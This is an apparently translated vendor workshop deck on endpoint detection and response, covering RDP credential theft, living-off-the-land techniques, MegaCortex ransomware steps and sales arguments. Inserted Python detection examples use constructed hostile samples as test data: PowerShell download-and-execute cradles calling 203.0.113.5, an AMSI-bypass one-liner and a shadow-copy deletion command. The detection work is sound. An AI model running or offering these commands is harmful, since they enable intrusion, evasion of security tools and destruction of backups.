Slide 1
Endpoint Detection and Response Workshop
Sebastian Kaiser, Sales Engineer
2019-06-05
Slide 4
Audience participation 1
Slide 5
Threat landscape
Slide 6
Cyber Attack Attribution Map – It sure looks fancy…
Who is attacking?
• 77% criminals
• 15% espionage
• 5% hacktivists
• 3% warfare
We even have nation states launching ransomware.
Stats: Hackmageddon.com
Slide 7
Malware statistics
Slide 9
The age of single-use malware
• 75%: 75% of the malicious files SophosLabs detects are found only within a single organization.
• 400,000: SophosLabs receives and processes 400,000 previously unseen malware samples each day.
Slide 10
Which malware types did we see yesterday?
[Chart: share by malware type; the chart shows 67%, 13%, 13%, crypto-jacking 2% and ransomware 5%, with the labels generic malware, modern malware and zero-day malware]
• Generic malware: variants of known malware / toolkits
• Modern malware: (known) exploits, privilege escalation, password theft, persistence; a combination of several techniques; targets include banking credentials, e-mail addresses and credit card data
• CryptoJacking: malicious use of CPU power to mine cryptocurrencies
• Ransomware: malicious encryption of files and disks
• Zero-day malware: multi-stage zero-day attacks; worms, trojans, VB script, PDF, fileless attacks
Source: SophosLabs, August 2018, region: CEEMEA
Slide 11
Who threatens me (today)?
• Script kiddies: the script kiddie of the 2000s
• Today's criminals: hacker, electricity thief (crypto-jacking), extortionist
Slide 12
What protects me today?
AntiVirus, NextGen Endpoint, EDR
Slide 13
Caution!
EDR != more protection
Slide 14
Caution!
EDR = more visibility
Slide 15
Caution!
So much money for a bit of visibility?
Slide 16
Come in and find exfil out
Slide 17
So what can a hacker do in 3 hours? How about 10 min?
RDP credentials for sale
Cost per RDP password: $3.00 to $16.00
Slide 18
RDP credential stores
UAS – Ultimate Anonymity Services
Over 40K RDP passwords for sale at any given time
Slide 19
Many organizations allow RDP
• Windows makes it easy to allow remote access
• Turn on RDP
Slide 21
So how did they steal my RDP password?
• Search the internet for devices that allow RDP authentication
• Follow the online video demos on how to brute force RDP with NLBrute
Slide 22
2018 Threat Space Change – Kill Chain Compression
Pre-breach:
• Recon: harvesting e-mail addresses, conference information, etc.
• Weaponization: coupling exploit with backdoor into deliverable payload
• Delivery: delivering weaponized bundle to victim via email, web …
• Exploitation: leveraging a vulnerability or functionality to execute code on victim's machine
• Installation: installing malware on the asset
Post-breach:
• Command & Control: command channel for remote manipulation of victim
• Actions on Objective: with 'hands on keyboard' access, intruders accomplish their goal
Defensive layers shown along the chain: Firewall, Web and E-mail Filtering, Sandboxing, User Training; Traditional AV, File Scanning, White Listing; SIEM, EDR and Anomaly Detection
Slide 23
Some Good News – Use of Exploit Kits has fallen sharply
Fileless attack
Criminal uses:
o Infect victim via malvertising
o Deliver ransomware, cryptojackers, botnets and banking trojans
Exploit kits that are no longer popular:
o Blackhole – arrested (2013)
o Angler – Russian crackdown (2016)
o Neutrino – went private
o Sundown – stopped their service, code leaked
o Disdain – disappeared
o Terror – disappeared
Currently active kits:
o RIG
o Grandsoft
o Magnitude
o Fallout
Tactical shift to malicious documents, macros and scripts
Slide 24
Living off the land
• PowerShell
  • Binary to HEX
  • Upload to pastebin
  • Load in memory
  • NEVER TOUCHING THE DISK!
• cmd.exe
• WMIC
Slide 25
Kill chain?
Slide 26
Cyber Kill Chain: the stages of a cyberattack
Pre-breach: Delivery, Exploitation, Installation
Post-breach: Command & Control, Actions on Objective ($ $ $)
Slide 31
Ransomware Evolved! LockerGoga & MegaCortex
Slide 32
Copycats

| | SamSam | BitPaymer | Ryuk | Dharma | GandCrab |
|---|---|---|---|---|---|
| Type | Targeted | Targeted | Targeted | Targeted | RaaS |
| Deployment | RDP | RDP | RDP | RDP | RDP/Email/Exploit kits |
| Victim profile | Medium/large organizations | Medium/large organizations | Medium/large organizations | Small organizations | Any |
| Typical ransom | $40,000 | $50,000-$1M+ | $100,000 | $5,000 | $1,000-$8,000 |
| Frequency | 1+ per day | Multiple per week | Multiple per week | Multiple per day | Unknown |
| Targets | All servers and endpoints | All servers | All servers | Critical servers | Any |
| Regions affected | Global w/US concentration | Global | Global | Global | Global |
Slide 34
What is MegaCortex?
• Many MATRIX references (including spelling mistakes)
• Ransomware with automated and manual elements = blended threat
• First samples on VirusTotal in January 2019
• Increasing attacks on companies since May 2019
• MegaCortex is cryptographically signed, with references to other malware families
• Individual version for each victim, with a 3-hour time window for execution
• Infects all reachable machines from the domain controller
• Encrypts files, deletes Windows shadow copies
Slide 35
Attack steps (1)
• Infection path probably an Emotet/Qbot payload
• From the infected domain controller, a PowerShell script is started with stolen admin credentials
• This starts a reverse Meterpreter shell through which the attacker can (manually) execute commands on the domain controller from remote
Slide 36
Attack steps (2)
• From the DC, the malware is distributed via WMI (Windows Remote Administration) to all reachable clients and started there via a psexec copy
Slide 37
Attack steps (3)
• On the clients, a batch file "stop.bat" kills 44 processes, stops 189 services and disables 194 services
• Then the actual ransomware "winnit.exe" is started
Slide 38
Attack steps (4)
• For encryption, MegaCortex uses a DLL module that is started by the Windows component rundll32.exe (one instance per 10 files)
• MegaCortex deletes shadow copies
Slide 39
Attack steps (5)
• Files on the infected machines are encrypted with an individual key per machine
• Ransom demand
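As an added example (not the workshop's own material and not the product's telemetry), the following Python sketches how the chain described in steps 1 to 5 shows up in process-creation events: PowerShell on a domain controller, WMI/psexec fan-out from the DC to many clients, a mass service stop by stop.bat, a burst of rundll32.exe children under winnit.exe, and shadow-copy deletion. The event field names, thresholds and all sample values are assumptions, and the vssadmin command line is the usual shadow-copy deletion signature rather than something the slides state.

```python
from collections import defaultdict

# Constructed process-creation events shaped after the MegaCortex chain on the
# slides. The field names (host, role, parent, image, cmdline, remote_host),
# the thresholds and every value below are assumptions made for this example,
# not a real EDR schema or telemetry from an incident.
def _ev(host, role, parent, image, cmdline="", remote_host=None):
    return {"host": host, "role": role, "parent": parent, "image": image,
            "cmdline": cmdline, "remote_host": remote_host}

EVENTS = (
    # Step 1: PowerShell launched on the domain controller (reverse shell stage).
    [_ev("DC01", "dc", "services.exe", "powershell.exe",
         "powershell.exe <constructed script>")]
    # Step 2: fan-out from the DC to reachable clients via WMI and a psexec copy.
    + [_ev("DC01", "dc", "powershell.exe", "wmic.exe", remote_host=f"WS{n:02d}")
       for n in range(1, 7)]
    + [_ev("DC01", "dc", "cmd.exe", "psexec.exe", remote_host=f"WS{n:02d}")
       for n in range(1, 7)]
    # Step 3: stop.bat stopping many services, then winnit.exe starts.
    + [_ev("WS01", "client", "cmd.exe", "net.exe", f"net.exe stop svc{n}")
       for n in range(12)]
    + [_ev("WS01", "client", "cmd.exe", "winnit.exe", "winnit.exe")]
    # Step 4: encryption DLL via rundll32.exe, one instance per 10 files, then
    # shadow copies removed (vssadmin command line assumed as the signature;
    # the slides only say that shadow copies are deleted).
    + [_ev("WS01", "client", "winnit.exe", "rundll32.exe",
           "rundll32.exe <constructed>.dll") for _ in range(25)]
    + [_ev("WS01", "client", "winnit.exe", "vssadmin.exe",
           "vssadmin.exe delete shadows /all /quiet")]
    # Benign admin activity on another client that must not fire.
    + [_ev("WS02", "client", "explorer.exe", "powershell.exe",
           "powershell.exe Get-Process"),
       _ev("WS02", "client", "svchost.exe", "rundll32.exe",
           "rundll32.exe shell32.dll,Control_RunDLL")]
)

REMOTE_EXEC_TOOLS = {"wmic.exe", "psexec.exe", "psexesvc.exe"}
FANOUT_MIN_HOSTS = 5      # distinct targets before one source host is suspicious
SERVICE_STOP_MIN = 10     # stop.bat stopped 189 services; 10 on one host is already odd
RUNDLL32_BURST_MIN = 10   # one rundll32 per 10 files gives a burst from one parent


def detect(events):
    """Return (host, finding) pairs for the observable stages of the chain."""
    findings = []
    remote_targets = defaultdict(set)     # source host -> remote hosts reached
    service_stops = defaultdict(int)      # host -> number of service stop commands
    rundll32_children = defaultdict(int)  # (host, parent) -> rundll32 launches
    for e in events:
        image, cmd = e["image"].lower(), e["cmdline"].lower()
        parent = e["parent"].lower()
        if e["role"] == "dc" and image == "powershell.exe":
            findings.append((e["host"], "powershell-on-domain-controller"))
        if image in REMOTE_EXEC_TOOLS and e["remote_host"]:
            remote_targets[e["host"]].add(e["remote_host"])
        if image in {"net.exe", "net1.exe", "sc.exe"} and " stop " in f" {cmd} ":
            service_stops[e["host"]] += 1
        if image == "rundll32.exe":
            rundll32_children[(e["host"], parent)] += 1
        if image == "vssadmin.exe" and "delete shadows" in cmd:
            findings.append((e["host"], "shadow-copy-deletion"))
    # Aggregated signals: one DC reaching many clients, many stops on one host,
    # and many rundll32 launches from the same parent on one host.
    for host, targets in remote_targets.items():
        if len(targets) >= FANOUT_MIN_HOSTS:
            findings.append((host, f"remote-execution-fanout:{len(targets)}-hosts"))
    for host, n in service_stops.items():
        if n >= SERVICE_STOP_MIN:
            findings.append((host, f"mass-service-stop:{n}"))
    for (host, parent), n in rundll32_children.items():
        if n >= RUNDLL32_BURST_MIN:
            findings.append((host, f"rundll32-burst:{n}-from-{parent}"))
    return findings


if __name__ == "__main__":
    for host, finding in detect(EVENTS):
        print(f"{host}: {finding}")
```

Each rule on its own is noisy in a large estate; the point of the example is that the five findings line up on DC01 and WS01 in the order the slides describe, which is what an analyst would correlate in a threat case.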
Slide 40
[Diagram: kill chain stages (reconnaissance, weaponization, delivery, exploit, installation, command channel, target) with MegaCortex (EXE vs. DLL) mapped against the protection technologies]
MegaCortex
• Spread via: privilege escalation with stolen admin credentials, WMI remote execution, remote PSEXEC
• Persistence: disables services
• Command & Control: reverse Meterpreter shell via PowerShell script
• Payload: crypto-trojan
Protection technologies: APPLICATION CONTROL, NETWORK THREAT PROTECTION, LOCAL PRIVILEGE MITIGATION, APPLICATION LOCKDOWN, CODE/MEMORY/APC MITIGATIONS, THREAT CASE (RCA) & EDR, CREDENTIAL THEFT PROTECTION, ANTI-RANSOMWARE, SYNCHRONIZED SECURITY, ANTI-VIRUS, PUA, HIPS, MACHINE LEARNING (ML)
Slide 41
Threat case
Slide 43
[Diagram: kill chain stages (reconnaissance, weaponization, delivery, exploit, installation, command channel, target) with MegaCortex (EXE vs. DLL) mapped against the protection technologies shown in the video]
MegaCortex
• Spread via: use of stolen admin credentials, WMI remote execution, remote PSEXEC
• Persistence: kills processes, disables services
• Command & Control: reverse Meterpreter shell via PowerShell script
• Payload: crypto-trojan
Protection technologies in the video: APPLICATION CONTROL, NETWORK THREAT PROTECTION, LOCAL PRIVILEGE MITIGATION, APPLICATION LOCKDOWN, CODE/MEMORY/APC MITIGATIONS, THREAT CASE (RCA) & EDR, CREDENTIAL THEFT PROTECTION, ANTI-RANSOMWARE, SYNCHRONIZED SECURITY, ANTI-VIRUS, PUA, HIPS, MACHINE LEARNING (ML)
Slide 45
How do I protect myself against MegaCortex?
• Two-factor authentication instead of passwords
• Disable PowerShell as well as psexec/pskill
• Regular backups, offline/offsite
• Intercept X Advanced with EDR on workstations AND servers
http://bit.ly/megacortex
http://bit.ly/megacortex2
Slide 46
Endpoint Evolved
Slide 47
Back then: protection against malware
"We've got this covered"
CENTRAL ENDPOINT PROTECTION
Slide 48
Yesterday: protection against exploits + ransomware
Surprise: AntiVirus is dead
Advanced
Slide 49
Today: detecting and stopping hacking
It's not as easy as everyone said!
Advanced with EDR
Slide 50
Sophos Endpoint Protection
[Table: feature comparison; columns: competitor endpoint protection, CENTRAL ENDPOINT PROTECTION, Advanced, Advanced with EDR; check marks as shown on the slide]
AV signatures / HIPS / Live Protection ✓ ✓ ✓
Device / Web / App Control ✓ ✓ ✓
Data Loss Protection (DLP) ✓ ✓ ✓
Malicious Traffic Detection (MTD) ✓ ✓ ✓ ✓
Security Heartbeat ✓ ✓ ✓ ✓
Deep Learning ✓ ✓ ✓
CryptoGuard ✓ ✓ ✓
WipeGuard ✓ ✓ ✓
Anti-hacker technologies (CredGuard etc.) ✓ ✓ ✓
Exploit Protection ✓ ✓ ✓
Root cause analysis ✓ ✓ ✓
Automatic / manual client isolation ✓/- ✓/- ✓/- ✓/✓
Malware analysis by SophosLabs ✓
Company-wide threat hunting ✓
Slide 51
What is EDR (Endpoint Detection and Response)?
EDR is a holistic approach to endpoint security with a focus on
• detection of events and security incidents
• response to security incidents
• threat hunting
• forensic investigation after an incident
Advanced with EDR integrates all EDR components in a single solution
Slide 52
Which product for whom?
• CENTRAL ENDPOINT PROTECTION: for companies that believe AntiVirus is entirely sufficient
• Advanced: for companies that are afraid of ransomware
• Advanced with EDR: for companies that are afraid of ransomware and hackers and want to do something about it
Slide 53
Far too expensive! Far too complex!
We are not set up for that!
Nobody is interested in our data!
Firewall and AntiVirus have always been enough!
Slide 54
These are actual statements, made before it is even clear what support EDR can offer.
Slide 55
The need for EDR is defined by "the gap"
Slide 56
[Diagram: malicious vs. benign, the gap between them, and where "Traditional" EDR sits]
Slide 57
EDR Evolved
• First generation: manual hunting, resource intensive, endless data
• Second generation: AI automation, scalable expertise, intelligent information
Slide 58
Intelligent EDR – Now On Endpoint and Server
• EDR starts with the strongest protection
• Add expertise, not headcount
• Guided incident response
Slide 59
Proof: survey of 3,100 IT managers
Survey of 3,100 IT managers worldwide in companies with 100-5,000 employees, period Dec. 2018 - Jan. 2019
• 73% were victims in 2018, on average twice
• 20% do not know how they were infected
• Response time (hours)
• 4 days of effort per month for investigations, 85% of it wasted
Slide 60
Add Expertise, Not Headcount: The First Detection and Response Solution for IT Generalists and the Specialist
• Security analyst: detect and prioritize suspicious events
• Malware analyst: reverse engineer suspicious files
• Threat intelligence analyst: integrate and interpret threat feeds
Slide 61
Live demo
Advanced with EDR
Slide 62
ESH – File Info (explain ML, PUA and reputation)
Slide 63
Threat Analysis Center
EDR across endpoint and server
All threat cases, alerts and searches, across all device types
Slide 64
Security analysis: cross-estate threat hunting
Slide 65
Threat intelligence analysis: access on-demand threat intelligence curated by SophosLabs
Slide 66
Malware analysis
Analyze files using deep learning
Page 67
Understand your security posture with guided investigations
Page 68
Respond with the click of a button
Page 69
Threat insight
• Authentication events: logon attempts and credential history
• Executables: hunt and investigate potential malware
• PowerShell: scripts, malicious IT tools, hacker tools, command-line programs
Page 70
Audience participation 2
Page 71
4 sales approaches
Page 72
Market-leading protection
• Deep Learning
• Anti-Ransomware
• Anti-Exploit
• Web/Device/App Control
• Root cause analysis
• Synchronized Security
Advanced
Page 73
Advanced: market-leading protection (Deep Learning, Anti-Ransomware, Anti-Exploit, Web/Device/App Control, root cause analysis, Synchronized Security)
Advanced with EDR: additionally answers the questions
• Has a threat spread?
• Is an attack still in progress?
• Are there "dormant" threats?
• Has data been stolen? -> GDPR/compliance!
• Enterprise-wide search for and containment of threats
Page 74
Sales 1
Page 75
Best solution on the market – the biggest band-aid
• Lucky case: the customer always buys the best protection (e.g. because of GDPR)
• The customer says: that is too expensive. Where is the added value over AV?
o Compliance
o Visibility
o Protection
o Incident handling
o Automatic response
• Is Sophos really expensive? For comparison:
o Kaspersky + CrowdStrike + Cylance is more expensive than Sophos
o Microsoft M365 E5 (5 consoles) = 58 USD/month/seat
o Staff effort for managing several consoles
o Downtime/analysis effort after an incident
Page 76
Proof: best protection and lowest total cost
NSS Labs Advanced Endpoint Protection Comparative Report, March 2019
Page 77
Sales 2
Page 78
Incident handling & analysis
• Customer reports an attack
• Install CIXAEDR
• Stop the attack
• Analysis
o What exactly happened?
o Chain of events
o Sophos Labs in a Box -> AI support for the analysis
o Has the threat spread? Is it still in progress?
o Has data been exfiltrated?
• Target audience
o IT admins, IT managers
• Added value for the partner
o Lead generation
Page 79
Proof: survey of 3,100 IT decision-makers
Survey of 3,100 IT decision-makers worldwide at companies with 100 to 5,000 employees, December 2018 to January 2019
• Response time in hours
• 73% were victims in 2018, on average twice
• 20% do not know how they were infected
• 4 days of effort per month on investigations, 85% of it wasted
Page 80
Sales 3
Page 81
Compliance
• GDPR, PCI, HIPAA, SOX, KRITIS, Basel III, risk management
• Protection of data according to the "state of the art" is required (AV + firewall is NOT state of the art)
• Obligation to prove whether data was exfiltrated during a security incident
• Risk management
o Cost of the incident <-> cost of security
• Target audience:
o CISO, CEO, CFO
• Added value
o Non-technical/SMT contact persons
Page 82
Proof
Page 83
Sales 4
Page 84
Visibility, ability to give answers
• Are we affected?
o Attack XY, CVE, admin tools
• Are we protected?
• IOCs (IPs, URLs, hashes)
• Suspicious swarm behaviour / grey area
• Target audience:
o IT managers
• Added value for the partner
o Service
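The "are we affected?" question on this slide is answered by sweeping the estate for the IOC types it lists: file hashes, IPs and URLs. The following is an added example of that sweep logic, written for this transcript; it is not Sophos code and not part of the original deck. The IOC feed, the files it writes into a temporary directory and the proxy log lines are all constructed, and the sha256 entry is computed from the constructed file so the example runs offline. Threat-intel feeds are usually "defanged" (hxxp, [.]), so indicators are normalised before matching; URL indicators are reduced to their host, which is an assumption about how you want to match.

```python
"""Sweep a host for indicators of compromise: file hashes, IPs, URLs/domains.

Added example for this workshop transcript, not Sophos code. Feed, files and
proxy log lines below are constructed; the hash IOC is derived from the
constructed dropper so the example runs offline.
"""
import hashlib
import os
import re
import tempfile
from urllib.parse import urlsplit

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
IP_TOKEN_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])")

# Constructed sample content (not a real binary) and the hash a feed would carry for it.
DROPPER_BYTES = b"MZ\x90\x00constructed dropper sample, not a real binary"
CLEAN_BYTES = b"quarterly report, nothing to see"
DROPPER_SHA256 = hashlib.sha256(DROPPER_BYTES).hexdigest()

IOC_FEED = [
    "# constructed, defanged IOC feed",
    "hxxp://evil[.]example/payload.ps1",
    "203[.]0[.]113[.]5",
    DROPPER_SHA256,
]

PROXY_LOG = [  # constructed proxy log lines
    "2019-06-05T10:12:01Z ws-102 GET http://evil.example/payload.ps1 200",
    "2019-06-05T10:12:09Z ws-102 CONNECT 203.0.113.5:443 200",
    "2019-06-05T10:13:44Z ws-101 GET https://www.example.org/ 200",
    "2019-06-05T10:15:02Z srv-db01 GET http://203.0.113.5/p.exe 404",
]


def refang(indicator: str) -> str:
    """Undo common defanging so feed entries compare equal to live observations."""
    s = indicator.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.I)   # hxxp:// and hxxps://
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def load_iocs(feed_lines):
    """Parse a feed into {'sha256', 'ip', 'domain'} sets; '#' comment lines and blanks are skipped.
    URL indicators are reduced to their host name (a deliberate matching choice)."""
    iocs = {"sha256": set(), "ip": set(), "domain": set()}
    for line in feed_lines:
        raw = line.strip()
        if not raw or raw.startswith("#"):
            continue
        ind = refang(raw).lower()
        if SHA256_RE.match(ind):
            iocs["sha256"].add(ind)
        elif IPV4_RE.match(ind):
            iocs["ip"].add(ind)
        elif "://" in ind:
            host = urlsplit(ind).hostname
            if host:
                (iocs["ip"] if IPV4_RE.match(host) else iocs["domain"]).add(host)
        else:
            iocs["domain"].add(ind)
    return iocs


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep_files(root: str, iocs: dict):
    """Return sorted [(path, sha256)] for files under root whose hash is on the feed."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            digest = sha256_file(path)
            if digest in iocs["sha256"]:
                hits.append((path, digest))
    return sorted(hits)


def sweep_log(lines, iocs: dict):
    """Return [(line_no, indicator)] for lines referencing a feed domain or IP, one entry per pair."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            host = (urlsplit(url).hostname or "").lower()
            if (host in iocs["domain"] or host in iocs["ip"]) and (n, host) not in hits:
                hits.append((n, host))
        for ip in IP_TOKEN_RE.findall(line):   # bare IPs, e.g. CONNECT lines
            if ip in iocs["ip"] and (n, ip) not in hits:
                hits.append((n, ip))
    return hits


def build_sample_tree(root: str) -> None:
    """Write the constructed files: one clean document, one dropper in Downloads."""
    os.makedirs(os.path.join(root, "Downloads"))
    with open(os.path.join(root, "report.txt"), "wb") as fh:
        fh.write(CLEAN_BYTES)
    with open(os.path.join(root, "Downloads", "updater.exe"), "wb") as fh:
        fh.write(DROPPER_BYTES)


def run_sweep() -> dict:
    """Run both sweeps against the constructed data and return the findings."""
    iocs = load_iocs(IOC_FEED)
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        files = [(os.path.relpath(p, root).replace(os.sep, "/"), d) for p, d in sweep_files(root, iocs)]
    return {"iocs": iocs, "files": files, "log": sweep_log(PROXY_LOG, iocs)}


if __name__ == "__main__":
    result = run_sweep()
    for path, digest in result["files"]:
        print(f"FILE  {path}  {digest[:16]}...")
    for line_no, indicator in result["log"]:
        print(f"LOG   line {line_no}: {indicator}")
```

Two caveats a practitioner should keep in mind: a hash only catches an identical copy, so a repacked sample slips past this sweep (which is why the deck pairs IOC search with behavioural detection), and matching on the host rather than the full URL means a changed path still hits but a changed subdomain does not. An EDR product runs the same comparison against telemetry already collected from every device instead of walking each disk.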
Page 85
Proof
Page 86
Proof
• Customers ask partners
• "Would we be protected against Emotet, LockerGoga, MegaCortex, WannaCry etc. if we bought the Sophos solution?"
• Apart from the fact that, according to the latest tests, the solution has the best protective effect, it also includes the interface to an expert system for answering these questions
• "Has a customer ever asked you whether they are protected against the threat that was on the Tagesschau last night?"
Page 87
Tools for proof
Page 88
Outlook?
Page 89
Improved reports
Set up scheduled reports
o Define report criteria
o Schedule an email notification
o Link or attached document
Endpoint Protection Summary
Available NOW
Page 90
Admin tool – PowerShell usage
All use of PowerShell is recorded and searchable from Central.
• Isolate the device while investigating
• Generate a forensic snapshot to dive deep
Available NOW
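Recording every PowerShell invocation is only useful if someone searches it for attacker tradecraft, which is what the "PowerShell: scripts, malicious IT tools, hacker tools" threat-insight item on slide 69 and this slide are about. The following is an added example of such a hunt, written for this transcript; it is not Sophos code and it does not use the Sophos Central search. It runs offline over constructed records shaped like exported PowerShell script block log entries (Windows Event ID 4104, which on a plain Windows host requires script block logging to be enabled via policy, EnableScriptBlockLogging=1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging). It flags encoded commands, download cradles, hidden windows and AMSI tampering, and decodes -EncodedCommand payloads (base64 over UTF-16LE) so the hidden command is scored as well. The host names, users, rule weights and the sample payload are all assumptions.

```python
"""Hunt PowerShell script-block records for common attack tradecraft.

Added example for this workshop transcript, not Sophos code. It assumes that
PowerShell script block logging (Windows Event ID 4104) has been exported as
records with 'host', 'user' and 'script' fields; the sample records below are
constructed, not real telemetry, and the rule weights are illustrative.
"""
import base64
import re

# -EncodedCommand and its short aliases (-e, -en, -enc) followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Each rule: (name, compiled regex, weight). A rule counts once per record.
RULES = [
    ("encoded_command", ENCODED_RE, 2),
    ("download_cradle", re.compile(
        r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
    ("hidden_window", re.compile(r"-W(?:indowStyle)?\s+Hidden\b", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-(?:ExecutionPolicy|Exec|Ex|Ep)\s+Bypass\b", re.I), 1),
    ("no_profile", re.compile(r"-NoP(?:rofile)?\b", re.I), 1),
    ("amsi_tamper", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I), 5),
]


def encode_command(command: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(script: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    match = ENCODED_RE.search(script)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def score_event(event: dict) -> dict:
    """Score one record; the decoded payload is scanned together with the raw script text."""
    decoded = decode_encoded_command(event["script"])
    text = event["script"] + ("\n" + decoded if decoded else "")
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return {"host": event["host"], "user": event["user"], "score": score,
            "hits": hits, "decoded": decoded}


def hunt(events, threshold: int = 3):
    """Return findings at or above the threshold, highest score first (stable for ties)."""
    findings = [score_event(e) for e in events]
    return sorted((f for f in findings if f["score"] >= threshold),
                  key=lambda f: f["score"], reverse=True)


# Constructed payload hidden behind -Enc, as a dropper would do it.
HIDDEN_PAYLOAD = ("Invoke-WebRequest http://203.0.113.5/p.exe -OutFile $env:TEMP\\p.exe; "
                  "Start-Process $env:TEMP\\p.exe")

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"host": "ws-101", "user": "CORP\\j.doe",
     "script": "Get-ChildItem C:\\Users\\j.doe\\Documents | Measure-Object"},
    {"host": "ws-102", "user": "CORP\\svc-backup",
     "script": "powershell.exe -NoP -W Hidden -Enc " + encode_command(HIDDEN_PAYLOAD)},
    {"host": "srv-db01", "user": "CORP\\admin",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"host": "ws-103", "user": "CORP\\a.smith",
     "script": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
               ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['score']:>2} {f['host']:<9} {f['user']:<16} {','.join(f['hits'])}")
        if f["decoded"]:
            print(f"   decoded: {f['decoded']}")
```

The point of decoding before scoring is that the encoded record on ws-102 looks like a single flag to a naive string search, while its payload is a download cradle; scoring the decoded text raises it above the plain cradle on srv-db01. The rules are a starting point, not a detection engine: they will miss obfuscated variants (string concatenation, tick-escaping), and a benign admin script can trip -NoProfile or -ExecutionPolicy Bypass, which is why the low-weight rules only contribute when combined with others.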
Page 91
Threat indicators – suspect executables
• Identification of the most suspect executables across all devices
• Priority ranked based on a new machine learning model
• Generate a threat case to investigate and take action
Page 92
Audience participation 3
Page 93